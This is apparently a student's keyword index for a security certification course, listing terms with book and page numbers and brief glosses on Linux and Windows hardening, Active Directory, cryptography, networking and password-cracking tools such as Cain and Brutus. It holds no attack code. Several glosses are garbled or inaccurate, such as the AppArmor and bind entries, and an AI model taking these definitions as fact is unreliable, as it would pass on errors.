linux other security options                      6   199   Boot Loader Password, PS, Netstat
security options in linux                         6   199   Boot Loader Password, PS, Netstat
security enhanced applications - Linux            6   200   SELinux and Apparmor
SELinux                                           6   200   Security Enhanced Linux, enhance the default DAC security of the unix system with the inclusion and mangement of a MAC security effort
AppArmor                                          6   200   is a SECLinux & the only answer is NO, i.e --> more restricted security rules.
SELinux                                           6   201   a linux security enhancement features, uses security based policies , based on u.s department of defense style MAC, uses linux security modules(LSM) in linux kernel

SELinux uses MAC                                  6   201   to allow admin the ability to controll all interactions of software on the system, the security model based on least privilege and start with users having no right
SELinux uses DAC                                  6   201   DAC allows users full security access over their installed and owned application, lead to security risks to system
SELinux parts                                     6   202   context of users in relation to object or subject (file or/and dir) context --> file or dir and have 3 parts user account , role,type or domain
role                                              6   202   set of permissions granted to a user and end with _r
user_r                                            6   202   all users assigned to that role
staff_r                                 6   202   admins are assigned to that role and are allowed to change to and from sysadm_r role
sysadm_r                                6   202
SELinux - type or domain                6   202   are assigned to processes so types of similar function can be assigned similar perm to application or the system end with _t and it is used when referring to object
object_r                                6   202   every object must have all three parts of a security context and are assigned by default to the role object_r
SELinux - security policy               6   203   target --> focus on particular app and processes unless identified the rest of the processes run un restricted, strict --> manage all processes and must be managed individually
setenforce                              6   203
Selinux DAC                             6   204   this allow the sys admin and all users to manage the security of files they own or manage
selinux DAC flaw                        6   204   any exploit that allow access to the system as any potential user may be able to elevate themselves or processes they own and defeat or circumvent security
selinux DAC deny                        6   204   will not use selinux access on object
selinux DAC allow                       6   204   selinux access policy applied
                                                  each level is a sensitivity -category pair with category being optional, when using category the level is written as senstivity:category-set( s0:c0.c1023)--> from c0 to c1023, if
SELinux - MLS/MCS                       6   205
                                                  category not used the level is written as sensitivity
                                                  each level is a sensitivity -category pair with category being optional, when using category the level is written as senstivity:category-set( s0:c0.c1023)--> from c0 to c1023, if
MLS/MCS                                 6   205
                                                  category not used the level is written as sensitivity
targeted policy enforcement             6   205   fedora 10 enforce MCS with targeted policy enforcement
MCS                                     6   205
MLS/MCS in fedora 10                    6   205   have only one sensitivity s0 and it support up to 1024 category c0-c1023
MLS                                     6   205   enforce the bell -la padula mandatory access model and is used in labeled security protection profile (LSPP) environment
LSPP                                    6   205   MLS enforce the bell-la padula mandatory access and is used in LSPP environment
                                                  an alternative to Selinux and also uses LSM framework, interchageable with Selinux ,include a MAC model fully configurable as well as a learning mode, available on suse,open
AppArmor                                6   206
                                                  suse, and ubuntu
pwd                                     6   210   command to print the working directory.
cd < directory name>                    6   211   change directory
ls                                      6   212   listing the contents of a directory
touch                                   6   213   to create files or update timestamps
clear                                   6   213   clear the screen from all outputs
cat <filename>, cat <filename> | more   6   215   to concatenate or display files.
mv <new file name> <new file name>      6   216   move file from one location to another or to rename it.
cp <filename> <destenation>             6   217   copy file from one location to another.
mkdir <newdir_name>                     6   218   make a directory
rmdir <dir_name>                        6   219   remove directory if empty only
rm<file_name>                           6   220   delete files or directory
su <user>                               6   221   allow user to temperoary become another user
sudo                                    6   222
find </> -name <file_name>              6   224   to search for files within a file system
grep <string> <file>                    6   225   to perform search of data within files.
man <command>                           6   226   to read the manual pages for any given command
Key Word                                   B      P      Comment
%CPU                                       6     65      ps output and it is percentage of cpu process is using
%MEM                                       6     65      ps output and it is percent of memory process is used
%systemroot%\security\Templates\           5     146
.INF security template                     5     145
.net frame work                            5     234     included in server 2008 r2 not in server2008
.rhosts file                               3      9      allow user to use r-commands,include machine and local user account,without password
                                                         min(0-59), hour(0-23), day of month(1-31), month(1-12), day of week (0 or 7 is sun) runas(this field for debian)
/etc/crontab                               6     79
                                                         command path
/etc/default/useradd                       6     56      INACTIVE,(no. of days after passwd expiration that account is disable) (default -1 mean disable), EXPIRE
/etc/group                                 6     46      system group db --> groupname:group passwd:groupid,group members
/etc/hosts                                 1     72      dns system root/system32/drivers/etc/hosts
/etc/inetd.conf                            6     76      config. File for inetd connect name of services to names of servers as tcp with /usr/sbin/tcpd.in.telnetd
                                                       it's field: service name socket type(stream,dgram,sunrpc_tcp,sunrpc_udp) protocol name (TCP|UDP or any
/etc/inetd.conf                            6   108,109 protocol in /etc/protocol) wait (for stream or dgram)|nowait(for dgram) server path server args (max no is five),
                                                       any line start with # is a comment
                                                       we can improve ftp logging by adding -1 in ftp line then restart inetd ( it will log also what the user made in ftp
/etc/inetd.conf                            6     142
                                                       conn. As get, mkdir, ...)
                                                       to control scripts (/etc/init.d/abc start|stop|restart), service not actually in rc directory, the rc dir just has link to
/etc/init.d                                6      90
                                                       each service that is in /etc/init.d
                                                       list each of the init processes the system should start at boot and stop at shut down have 4 fields
/etc/inittab                               6      74
                                                       id:runlevel:action:full pathof the binary
                                                       PASS_MAX_DAYS-->default:99999days, PASS_MIN_DAYS-->default:0days,PASS_MIN_LEN-->default 0(controlled by
/etc/login.defs                            6      55
                                                       PAM),PASS_WARN_AGE-->default 7days
                                                       The options entered in /etc/logrotate.conf may be used to set configuration parameters for any log file on the
/etc/logrotate.conf                        6     147
                                                       system. (compress,daily,weekly,monthly,size,rotate n,missingok,create)
                                                       This rotates the log file and creates a new log file with the specified permissions, owner, and group. The default is to
/etc/logrotate.conf - create option        6     147
                                                       use the same mode, owner, and group as the original file.
/etc/logrotate.conf - daily option         6     147   This is used to rotate log files daily.
/etc/logrotate.conf error address option   6     net   This mails logrotate errors to an address.
                                                         The include option allows the administrator to take log file rotation information, which may be installed in several
/etc/logrotate.conf - include option       6     147     files, and use it in the main configuration file. When logrotate finds the include option on a line in logrotate.conf ,
                                                         the information in the file specified is read as if it appeared in /etc/logrotate.conf .
/etc/logrotate.conf - missingok option     6     147     tells the logrotate to continue to the next file if the file doesn't exist rather than quit with an error
/etc/logrotate.conf - monthly option       6     147     This is used to rotate log files monthly
                                                  This specifies the number of times to rotate a file before it is deleted. A count of 0 (zero) means no copies are
/etc/logrotate.conf - rotate option   6   147
                                                  retained. A count of 5 means five copies are retained.
                                                  the log file is rotated when the specified size is reached. Size may be specified in bytes (default), kilobytes (sizek ), or
/etc/logrotate.conf - size option     6   147
                                                  megabytes (sizem ).
/etc/logrotate.conf - weekly option   6   147     This is used to rotate log files weekly
                                                  onfiguration parameters for a specific file are often required. A common example would be to include a section in
/etc/logrotate.conf directive {}      6   148     the /etc/logrotate.conf file to rotate the /var/log/wtmp file once per month and keep only one copy of the log.
                                                  When configuration is required for a specific file, the following format is used: filename { options}
/etc/logrotate.conf endscript         6   149     command marks the end of the prerotate or postrotate portion of this script.
/etc/logrotate.conf postrotate        6   149     specifies the following commands are to be run on log file after the file has been rotated by logrotate .
/etc/logrotate.conf prerotate         6   149     write command specifies actions to be taken prior to the file being rotated by logrotate .
/etc/logrotate.conf sharedscripts     6   149
/etc/logrotate.d                      6   147     directory contain all the logrotate config. Files
/etc/master.passwd                    6    51     free BSD shadow file name
/etc/pam.d                            6    58     Directory contain all PAM configuration files and named for the services they are control as /etc/pam.d/su
                                                  password enforcing (pam_cracklib argument) and restricting use of previous passwd (pam_unix argument) and
/etc/pam.d/system_auth                6    60
                                                  loking user account after fail login (pam_tally module)configuration file
/etc/passwd                           6    50     system users db -->username:x:uid,gid:commnet:homedir:login shell
/etc/rcX.d                            6    89     run (condition) level dir, normally there's one directory for each run condition, , file starts with S or K
/etc/security/opasswd                 6    61     if doesn't exit create it @ restriction use of previous password
/etc/services                         6    76     connect port numbers to protocols, have a list for all services telnet 23/tcp
/etc/seurity/passwd                   6    51     AIX shadow file name
                                                  linux and solaris shadow file name & it contains users encrypted passwd and passwd aging -->username:encrypted
/etc/shadow                           6   51,53
                                                  passwd:lastchg:min:max:warn:expire:inactive:flag
/etc/syslog.conf                      6   136     selector (facilities, level of priority)             action
/etc/syslog.conf actions              6   139     how messages should be handle ( file,terminal,remote host,user,fifo file)
                                                  facility: specifies how the msg was produced as (auth,cron,authpriv,daemon,kern,lpr,mail,news,syslog,user,local0-
/etc/syslog.conf facilities           6   137
                                                  local6)
/etc/syslog.conf levels               6   138     priority level (emerg, alert, crit, err, warning, notice, info, debug, none) * --> mean all
                                                  the global xinetd configuartion file, read once when xinetd service is started, some defaults in it (instances,
/etc/xinetd.conf                      6   110
                                                  logtype, log_on_success, log_on_fail, cps)
                                                  Directory containing all service-specific files, dir contain config file of each service managed by xinetd , these files is
/etc/xinetd.d dir                     6   111
                                                  read only when xinetd started
/tcb/files/auth/r/root                6    51     HP_UX shadow file names
/usr/src/.poop                        6   185     ramen worm save it's code in that directory on infected linux
/var/adm/messages                     6   132     solaris syslog file (date time hostname program name : msg sent to syslogd)
/var/adm/sulog file                     6   129   file fields: activity (always su) date time +/-(un/successful)    terminal starting user   ending user
/var/adm/SYSLOG                         6   132   IRIX syslog file (date time hostname program name : msg sent to syslogd)
/var/adm/syslog                         6   132   HP-UX syslog files (date time hostname program name : msg sent to syslogd)
a distribution group in AD              5   100   like an e-mail list
absinthe                                2   263   tool to make blind sql injection
absolute path( reference)               6    29   the path specified from the top of the tree to the desired file
Access Contol / Controlling Access      2   108   least privilege,neet to know,seperation of duties,rotation of duties
Access Control                          2   101
access control list ACL                 5    32   each resource has a list contain (SIDs and permission of each SID to this resource)
Access Control Scope                    2   102   Many area of IT
Access Control Techniques               2   109   DAC, MAC ,RBAC, ….
access control types                    1   238   directive,preventive,deterent,detective,suppressive,reactive,corrective
Access control: Passwords               2   118   how hash authen is done
Access managing                         2   111   account administration,maintenance,monitoring,revocation
accesschk.exe                           5   117   can check,modify your mic label
account administration                  2   111
Account control                         2   102   monitor unsuccessful login
account lockout policy                  5   164   duration,lockout threshold:5,account counter lock out:45min
Account Management                      2   102   create modify delete
account passwd info display             6    57   chage -l <username>
Accountability                          2   106   auditing ur logs
ACE (Access control entries)            5    90   individual permission of user,group,computer on object,indviual entry in DACL
Achilles                                2   232   tool that can edit in session cookie
Achilles                                2   274   HTTP Proxy (middleman between webserver and Brawser), can negotiate to seperateSSL(server,client)
Active Direcotry Permissions            5   112   each object has SACL ,DACL and creator owner
Active Directory Application Mode       5    10   ADAM,for application which don't store data in active directory,but use authentication
Active Directory Delegation Authority   5   114   delegate some authority..readinf data for hr
active directory domain                 5    32   database of user accounts
active directory groups                 5    99   how can a group be created
active directory size                   5    33   maximum size is 4TB
active directory store                  5    32   accounts,kerberos master keys,certficates,replication links,ou,trust relationships
                                                  In token ring with MAU ,primary machine checks for malfunctioning machines by polling them 7 times in each
active monitior machine                 1   14
                                                  second
active server page exploit              5   241   require .asp mapping
Active X                                2    36
ActiveSync                              5    17   malware can move from pc to mobile and vice-versa
Activex (signed Activex )               2   239   not secure,its contol run with same privilge of usr may admin
AD Authentication                                2   114   use Kerberos V5 don’t send pass through Network
ADAM                                             5    10   active directory application mode,LDAP-based services,better unix support
Adaptive chosen Plaintext attacks                4   73    special case of the chosen-plaintext attack, cryptanalyst knows: many chosen plaintext + many ciphertext
ADFS                                             5    10   active directory federation services,single sign-on across forests and company boundaries
ADM/ADMX templates                               5   157   administrtive templates,can be edited using notepad,ADM for any win version,
administritive controls                          3   262   policies,procedures,end-user security awareness program
administritive shares                            5   105   enter full UNC,C$,D$,ADMIN$>c:\windows,permission administrator full control
administritive shares                            5   105   $Admin allow authenticated users group
administritive shares IPC                        5   105   shouldn't be modified
administritive shares removing                   5   105   two reg keys are set to zero "autosharewks"REG_DWORD "autoshareserver"REG_DWORD
                                                           admins,domain admin,enterprise admin,schema admin,dns admin,account operator == Built-in administrator
administritve accounts                           5   175   account cannot be loged out == administrator account lockout from over the network == limit local account use of
                                                           blank password to console logon only == administrator account policies &recommendations
administritve accounts locking                   5   175   strong pass,smart card authentication,enable lockout for admin account,decoy account
administritve templates                          5   157   container for many security setting from registry,restrict control panal,password sceen saver
administritve templates                          5   157   ADM/ADMX templates ,ADM any win version ,ADMX from vista and later
Advanced security setting deny override allow
AES - Advanced Encryption Standard               4   62    has three key size: 128-bit , 192-bit , and 256-bit
AES - evaluation criteria                        4   62    security, cost, and algorithm and implementaion characteristics
AES algorithm details                            4   64    the algorithm details with Functions.
AES basic functions                              4   65    AddRoundKey(), SubBytes(), ShiftRows(), MixColumns()
AES development                                  4   66
Agulp                                            5    97   account>global groups>universal groups>local groups<permission == inner grp outer grp
AIDE                                             2    43   make integrity check
ALE (annualized loss expectency)                 3   268   annual expected loss based on a threat, SLE * Multi-hits of exploit
ALE (annualized loss expectency)                 3   270   ALE - Multi-Hits, Ale=SLE * annualized rate ocuurance
Algorithm comutational complexity                4   51
algorithm is group                               4   59    means that encryption multiple times is waste of time
alteranation of code                             3    40   comprimise the integrity of a program or data,create backdoors,virus,worms
annonymous access                                5   169   null session vulnerability,not used with xp and later so much
anomaly analysis                                 3   178   inclusive detection medthod,for sepcific protocols or applications
anonymous access disabling                       5   170   anonymous access-allow anonymous SID/NAME translation--> desabled
anonymous asscess                                5   170   NO access without explicit anonymous login
anonymous connection Aditional restrection for   5   170   Do not allow anonymous enumeration of SAM accounts and share --> enabled
Anonymous permissions/annon. Logon grp           5   170
Anonymous Restrict                               5   170   set to 2 to disable null session,system\currentcontrolset\control\lsa
anti-malware scanner                             5    18   for windowes mobile,airscanner,bitDefender,F-secure,computer Associates
antivirus - Activity monitoring          2    43   behavior blocker
anti-virus - heuristic(‫)ارشادي‬           2    43   searches on files looking for malicious-looking code routines, don’t dep on signature
antivirus - Integrity check              2    43
Antivirus capability                     2    42   Scanner,Activity monitor,integrity chk
antivirus -Scanners                      2    43
antivirus -Stripping E-mail Attachment   2    44
Apache Tomcat                            2   236   application server that implements java, java active pages
AppArmor                                 6   200   is a SECLinux & the only answer is NO, i.e --> more restricted security rules.
                                                   an alternative to Selinux and also uses LSM framework, interchageable with Selinux ,include a MAC model fully
AppArmor                                 6   206
                                                   configurable as well as a learning mode, available on suse,open suse, and ubuntu
apple finder program                     6   12    similar to windows " network neighborhood", in large network with multiple os make bandwidth issue
application behaviour hips               3   236   manufacture select supported App and record the intended functionality of the App in normal use
application control firewall             3    64   most popular perssonal firewall,have set of rules for applications
Application locker(App Locker)           5    12   specify what software is alllowed to run on users pc centrally
                                                   at least one server 2008 -R2 to push GPO of AppLocker , server2008/7 R2-enhanced SRP with new options ,
Application Locker(App Locker)           5   178
                                                   improvement in SRP
application protocols analysis           3   179   exclusive method,standered definations,implementation nuances,changes to protocol
application shielding behavior           3   238   locks an application into a sandbox where it is not permitted to communicate with othe applications
application tier                         2   218   code and business logic,language(C,Java,PHP,VB),Application server(websphere,weblogic,tomcat,.Net

apt                                      6   161   Advanced Package Tool, update tool for debian-based linux as knoppix and ubuntu, packages with .deb extention
                                                   store a DB of ur version & then contact the website to tell u the differences, it'll also tell u about the dependencies
apt-get                                  6   161
                                                   but won't install them.
apt-get install pkgname                  6   162   install new pkg
apt-get remove pkgname                   6   162   remove pkg
apt-get update                           6   161   update local DB of available package
apt-get upgrade                          6   161   download and install upgrades
apt-show-versions -a pkgname             6   162   show all available versions of a given package
apt-show-versions -u                     6   161   check and see which packages need updating
arbitrary code execution                 2   260   Web attack
Arbitrary Substituation                  4    18   use one-to-one substitution of characters.
ARO (annualized rate of occurance)       3   270   is the estimated frequency at which a threat is expected to occur, could be easy to calculate or very complex
ARP                                      1    68   is independent of IP EtherType in ethernet frame =0x0806
ARP (Address resolution protocol )       1    67   given Ip address determine mac,rfc826
arp header,types                         1    68   arp is not restricted for mac and IP only
Arrest                                   2   181   deprive individual of his freedom
ASP application service provider           2   244   SLE,patch Audit every 6 month,vuln scan
ASR (Automated System Recovery)            5    69   can be created using ntbackup.exe
asset identification and valuation         3   280   risk management step2,understand the quantitve analysis of your assets
                                                     aka "Public - key", Slow, public key widely distributed within digital signature, technical non-repudiation via digital
Asymmetric Key Cryptosystem                4   28
                                                     signature
                                                     cell=53byte,connection oriented,packet switching,shared network medium,Qos,Pvc,Svc,VPI,VCI,video streaming,low
ATM                                        1   15
                                                     latency
ATM                                        1   15    Asynchronous transfer module
Atm Pvc                                    1   16    permnant virtual circuit setupped manually in advance
ATM Svc                                    1   16    switched virtual circuit setupped automatically through a signaling protocol on the fly
Atm virtual channel identifier (VCI)       1   16    used to route cells from atm swith to another ,is identifying the connection between two ATM switches
ATM virtual Path identifier (VPI)          1    16   to label a collection of VCI grouped into a virtual path
attack history                             3   117   from 1995 to 2009
audit access to registry key               5   322
audit account logon events                 5   319
audit account management                   5   319
Audit best practices/should be audit       5   324   audit the interesting things,logs,privilage access,changes to admin access
audit directory service access             5   319
audit logon events                         5   319
audit object access                        5   319
audit object access policy                 5   321   enable it only nothing will be logged,enable it then enable sacl for your logs
audit policies                             5   319   audit account logon events,audit account management,audit directory access
audit policy change                        5   319
audit policy compliance                    5   297   maintain and check written logs,examine machines with tools
audit privilage use                        5   320
audit process tracking                     5   320
audit system events                        5   320
auditing                                   5   266   the gathering analysis of detailed information about network
auditpol.exe                               5   320   tool from resource kit enable or disable audit polcies from comand line
auditpol.exe /get/category:*               5   311   get the current audit policy for all categories
auditpol.exe /get/category:*               5   320
AUP (Acceptable use policy)                2    59   defines the acceptable or appropriate use of org.IT resources
AUP (Acceptable use policy)                2    74   provide guidline for appropiate use of org resources
Authentication                             2   106   something you(know,have,are), some place you are(consol)
Authentication                             4   12    validating the authenticity of the person with which u r communicating.
authoritive reply                          1    75   the client of dns can use the data and make actual connection
Authorization                              2   106   what you are auth to do and has access to what,least priviledge
autmomatic demotion to guest"file share"   5   174   simple file sharing winXp all remote authentication done using guest account
autokey of stream cipher                     4    24
automate sp install (Hands free SP)          5     55
automate sp with group policy                5     56
automatic intruder detection                 1    244      vibration,heat,pressure,beam sensors
                                                           connect in background on scheduld basis built in win2000 and later == windows/automatic update tab in
automatic update                             5     60
                                                           win2000sp3&later(AUT,schedled) == update use ISO file
automatic update                             6    160      not good to be used on production system, (by yum or up2date "Redhat update agent" or synapt "apt")
automation                                   5    266      everything can do with a windows without mouse
AUTOMOUNTD                                   6    105      rpc service mount and umount NFS resources only when needed
autoRuns                                     5    284      allow you to see and edit start up commands at boot,sysinternals
autorunsc.exe                                5    313      systeminternals autoruns
Availability monitoring                      2    270      alerts when site unavailable, helps to verify the functionality of the network and web server.
AYIYA                                        1     82      any thing in any thing tunnling
backup & restore center integration          5     80
backup 3 party                               5     74      ARCserve,ultrabac,Archive,OmniBack
                                                           having a backuo access, gives u the right to copy, erase or overwrite files, so dangerous in the hands of malicious
Backup access - OPSEC                        4    245
                                                           user.
backup generators                            1    232      covert fuel into electrical power,aren’t suitable for short duration failures because it needs time to warm up
                                                           u need to have a backup plane, & Don't make sure that this plane is working good until u have fully tested it and
Backup plan (schedule) - OPSEC               4   245,246
                                                           try to make full recovery.
backup vista home basic,perimum              5     72      doesn't support : backup all drives and systen state
backup win xp/2003                           5     69      backup-system state(registery,certificate DB,AD database, boot-up files
backup win7,2008,vista                       5     72      backup all drives and system state,backup selected file types,
backup/restore files and directories right   5    124      can make copy …ignore ntfs permissions
bad sites                                    5    187      include both known phishing sites & malware download URLs
Base-64 encoding                             2    247      isn't encrypted and provide no security,easy reversable
Baseline - definition                        2     64      more specific implementation -specific technical details- than standard , compulsory(mandatory)
Baseline document                            2     35      mapping the network,conduct vuln assessment
Baseline document - policy                   2     59
Basic mode Authentication                    2    247      data sent in HTTP header clear txt,Base-64 encoding
                                                           hardening program report on how secure system is and show security issues( educates admin),why it should be
Bastille linux                               6    189      fixed and what side effect the fix might have also can optionally fix issues (changes can be reverted) it run on
                                                           (linux,HP-UX,mac osx)
                                                           Plan for emergancy response (DRP&business resumption plan),Restor business aftrer disaster,long term impact to
BCP (business continuity plan)               2     83
                                                           business does not just involve IT but all levels of org.
BCP elements                                 2     89
BCP Key Component                            2     91      Assess,Evaluate,Prepare,Mitigate,Respond,Recover
BCP Vs. DRP                                  2    87
BCP/DRP                                      2    88
BCP/DRP Mistakes                             2    95
BCP-DRP lifecycle                            2    94   project initiation,risk analysis,BIA,build the plan,test and validate it,update it,approve
BD_ADDR                                      4   151   is the MAC address of the Bluetooth Device.
BDC                                          5    32   backup domain controller receive changes from other AD
best approach in identifying                 3   260   is to concentrate on protecting areas if comprimized could incur most damage
Best evidence                                2   188   Photo, Models, Drawings are used.
better os                                    6    5    all have adv. And limitation and liabilities and since they get together they represent risk
                                                       even if someone know how the algorithm work, without the key he should still unable to decipher the message, u
Beware of Overconfidence                     4   10
                                                       must protect ur key
BIA (Business Impact Analysis)               2   92    determine MTD (maximum tolerable downtime) ,evaluates the effect of disaster over time
big endian                                   3   32    the most significant bit is on the left side of a byte x00000000 ex. (Ip networking)
                                                       used to give a general idea of how many operations a problem takes to relative the input size n, used as indication
Big-O notation                               4   51
                                                       of a problem's complexity
binary disc image                            5    75   using dd command , symatic ghost tool, create image
bind                                         6   175   is a Linux proxy application used for DNS, & can coexist with Iptables.
binding                                      5   201   a path of communication between network component and physical network adapter
biometric words                              4   133   PGP translates the Hexadecimal digits into twenty Biometric words to be easy to pronounce to be validated
biometrics                                   1   241   provide the checking for physical characteristics of human body
Biometrics                                   2   144   PHY Attr Hand,eye,voice,face,Mannerisms(keystroke,hand written,tread)
Birthday attack(Birthday paradox)            4   75    used with hash attacks
BIS                                          2   178
Bit Locker Transparent 100% to users         5   136   TMP only
bit locker-encryprion                        5   133    for whole drive with paging&hybernate files
bit locker-integrity check details           5   134   Boot Sctore , Master Boot Record , BOOTMGR , BIOS code
bit locker-requiremnts                       5   134   two drive volumes boout up &system
bit-flipping attacks                         1   158   a way to manipulate the checksum of ip header
bitlocker availability                       5   133   win vista/ultimate and enterprise ,server2008,not in vista business or win7 professional
bitlocker benefits                           5   133   vertfication of inegrity,sector-level encryption
bitlocker boot volume                        5   133   contain windowes files c:/windows
bitlocker disabling                          5   138   quick,temp,doesn’t decrypt,key saved in plain text on hard,good 4 updating bios
bitlocker drive encryption                   5    11   can vertify integrity of boot-up files,encryption key in usb or TPM
bitlocker prequisite                         5   133   two ntfs volumes boot volume,system volume
bitlocker recovery                           5   139   4 ways
                                                       48-digit PIN inserted using function keys == FVEK when recovery password lost == BIOS support function Key to
bitlocker recovery password                  5   140
                                                       enter PIN or during emergency
bitlocker recovery/backup active directory   5   140   push recovery keys to AD and FVEK
bitlocker steps how it works?                     5   134   integrity check using SHA-1
bitlocker system volume                           5   134   contain files used during the boot process
bitlocker tpm options                             5   136   tpm+usb+PIN , TPM+usb , Tpm+Pin , Tpm only , usb token with no tpm
bitlocker turnoff                                 5   138   time consuming,full decryption
BITS (background intelligent transfer)            5    63   download in background and other application aren't interupted
Bit-slicing                                       2   125   technique of cracking rate=137mb/s
black box test                                    2   274   Code is closed source
blacklisting                                      2   268   filter out bad characters
blended threat                                    2    41   possess multiple propagation vector ex Nimda
blind sql injection                               2   263   Black Box attack
                                                            there are four modes and the mode will affect on the strength and performance of cryotosystem: ECB, CBC, CFB,
BLOCK cipher - modes                              4   22
                                                            OFB
Block Ciphers                                     4    22   encrypt one block of data at time
block worm traffic                                6   182
BlueScanner                                       4   154   tool for XP-SP2 allows user to discover nearby Bluetooth networks, and categorize by type and service they offer.
                                                            many of Bluetooth vulnerabilities on Application Layer, allow retrive of phonebook & calender, attacker remotely
BlueSnarf attack                                  4   155
                                                            create a virtual serial connection, this allows AT commands to be sent to the phone
                                                            is a cable replacement technology, no line-of-sight, support (data,voice, and other applications), can support up tp 7
Bluetooth                                         4   149
                                                            simultaneous connections.
Bluetooth classes 1, 2, and 3                     4   150   class 2 most commonly found in wireless card , phone, labtop computer
                                                            support up to 7 devices,cable replacement technology,can be used for proprightary protocols and for standereds
bluetooth PAN                                     1    7
                                                            based protocols
                                                            1- configure devices in non-discoverable mode, 2-audit Bluetooth environment, 3- use Strong PIN (12-digit), 4-
Bluetooth protection                              4   157
                                                            vendors should implement SIG 2.0 Specs/PKI support.
Bluetooth protocol analyzer                       4   152   can passively capture and record all Bluetooth network activity within range
Bluetooth security                                4   151   PIN, encrypt transferred data using a security key generated by using PIN & Bluetooth MAC
Bluetooth security issues                         4   152   eavesdropping attacks,
                                                            when two devices conncts for the first ime, they use the PIN & BD_ADDR to generate permanent link keys that are
Bluetooth Security keys                           4   151
                                                            stored on each device
                                                            attacker could capture the data exchange between Buletooth keyboard,mouse and desktop/labtop system, could
Bluetooth sniffing impact                         4   156
                                                            inject keystrocks remotely
Bluetooth specification                           4   150   Range: 1m,10m,100m, Max BW= 2.1 Mbps, Freq= 2.5 GHz (FHSS) EDR
                                                            protocol used to configure Bluetooth devices to extend access to the wired network over a wireless network, like
BNEP - Bluetooth Network Encapsulation Protocol   4   152
                                                            802.11
BNEP (Bluetooth network encapsulation protocol)   1    7    responsible for delivering network packets,standered based protocol
boarder router                                    1   33    to assist firewall,block rfc1918,only packet of our isp range can leave our network tp protect the firewall itself.
boot loader                          6     81      prepare the system to begin kernel, have 2 stages ( 1- MBR, 2- loader program that actually run unix kernel)
boot loader password                 6     85      adv: must have physical access, disadv: also physical access (if power outage or system reboot )
boot loader password                 6    199      enable additional security validation
Boot record infector                 2     21      ability to put it self at boot proccess to load at startup
branchCache                          5     16      server2008 R2,enable smb or http caching via peer to peer or centrally hosted
broadcast address                    1     62
broker proces                        5    182
browsing                             3     37      can reveal sensitive information useful for attacks
                                                   refer to actionable plan that coordinates efforts to restore org. to normal working involve all level of org not only
BRP (Business Resumption plan)       2     84
                                                   the IT, covers the tacticals of recovery of IT systems.
Bruce Schneier                       4     7
Brute force attack                   2    123      alwayes recover password but it matter of time
brute force PIN                      4    152      4-digit PIN could be brute forced at 63 msec, using a Pentium4 3GHZ system
brute forcing                        3     34      an attempt to gain access to system by bombarding it with possible guesses until the correct one found
Brutus                               2    274      brute force and password guesing tool,windows only
BSD pkg manager                      6    167      pkg_add,pkg_delete
BSOD blue screen of death            5     89
buffer overflow                      3     31      used to excute a code on a host,no boundary check for the inputs
Buffer overflow attack               2    260      Web attack
Buffer overflow defence              2    261      update,patch(web server and language),run vuln scanner,IPS,validate usr input
Bule sniff                           4    152      tool to attack Bluetooth, can locate and circumvent the security of BlueTooth networks.
Bulletin Board                       2    272      vuln to inputs attacks
bus physical topology disadvantage   1     8       confidentiality is not guarntied,low fault tolerance,poor reliability,poor traffic isolation captabilities,limited scalability
business case Risk management        3   273,274
                                                   if u can't proof that systems @ risk.. It\ll be harder to get fund for ur recommendations. U can use some existing
business case Risk management        3    274
                                                   resources of data like F/W or log system to proof to them, show them a "smoking gun".
business case summary                3    287
bypassing firewall techniques        3    103      worm,wireless,modems,tunneling,vpns,social engineering,home laptops
cable modem                          1     18      Data over cable interface specification (DOCSIS)
CAC - Common access card             4    115
cacking - methods                    2    123      find (user id,encryption algo,obtain enc pass,create list of possible pass,ec each pass in list,see if match
cain - Brute force attack            2    131      user select (all alpha,alpha+num+special char)
cain - Cryptanalysis attack          2    131      use tradeoff time/memory optm withpre-computed table
cain - Dictionary attack             2    131      It use Hybred attack:Reverse,upper to lower,append 2 digit
cain - Rainbw tables                 2    136
Cain dump password hashes and LSA             5   125
cain-password cracking                        2   130   audit cracking tool
Caligula virus                                2    37   info leakage,send PGP private key through FTP
canvas                                        3   118   exploitaion suites started in 2007
CAs - Certificate authorities                 4   117   create certification based on the user's identity information
cat <filename>, cat <filename> | more         6   215   to concatenate or display files.
cat 1,2                                       1    21   voice low bandwidth
cat 3                                         1    21   voice 10 mb
cat 4                                         1    22   Voice 16 mb
cat 5                                         1    22   100 mb
cat 5e,6                                      1    22   more than 100 mb
cause,effect,response                         3   257   determine the risk,analyze the impact of risk,determine action to handle these risks
cavity viruses                                2    23   write themselves to blank or unused areas in host files
                                                        plaintext is XOR with the previous ciphertext block, in this mode Two identical blocks of plaintext never encrypt to
CBC - (Cipher Block Chaining mode)            4   22
                                                        the same ciphertet
CCB (Change Control Board)                    5   297   to ensure changes are made within control parameters as a part of configuration managem
CCB (Change Control Board)                    5   297   any change done by IT department written here
                                                        one of the 802.1i protocols that provide: encryption, reply protection, integrity protection, require H/W ship for
CCMP - Counter-Mode/CBC-MAC Protocol          4   167
                                                        implement
CCTV (closed circuit television)              1   243   detective and preventive control
cd < directory name>                          6   211   change directory
cdfs                                          5    88   file system for cdrom
Centralized control                           2   114   TACACS,RADIUS
                                                        protect from log deletion, DoS possibility (so we need to determine specific machines and use firewall), need lot of
centralized logging                           6   151   disks, one machine holds lots of info ( use ssh with limited logins and IPs), easy to search and scan (generate single
                                                        reports)
CER (Crossover Error)                         2   145   FAR and FRR are equal
Certificate authorities models-Bridge CA      4   119
Certificate authorities models-hierarchical   4   119
Certificate authorities models-Hybrid         4   119
Certificate authorities models-Mesh           4   119
Certificate authorities trust models          4   119   hierarchical, Bridge, Mesh, Hyprid
Certificate policies document                 4   124   the documentation that specifies how certain certificate are to be used, tcp port 443
Certificate revocation list                   4   122
certificate's fingerprint                     4   133   used to trust the integrity of this certificate.
Certification key Escrow                      4   122   key backup
Certification life cycle                      4   120
Certification life cycle - expiration date    4   122
Certification life cycle - key ceremony       4   121   client browser
Certification life cycle - key storage                    4   121   by S/W (client browser) or H/W (TPM, CAC "Common Access cards")
Certification life cycle - regiteration & intialization   4   120
Cesar Cipher                                              4    19
CFB - (Cipher feedback mode)                              4    22   it is stream cipher used for encrypted interactive terminal
CGI common gateway interface                              2   236   standard for interfacing applications s/w with web server, allwos web server tp pass info(C,perl,pythn)
chage -l          (command)                               6   57    account passwd info display
Chain of Custody(‫)حجز‬                                     2   184   document evidence ,mentain its intigrity
Chalenge/response                                         2   142   not time based,user id-challenge-write in device-resose -write it
Challenge question web authen                             2   249
CHAP(Challenge Handshake Authen pr)                       2   113   use challenge/respone Authen,randome challenge,never send pass,
Charest.txt                                               2   134   define char used to gen rainbow tables
check point vpn-1                                         3   251   firewall plus something
chernobyl virus                                           2    37   destruct data,activate every 26April overworte data on HD
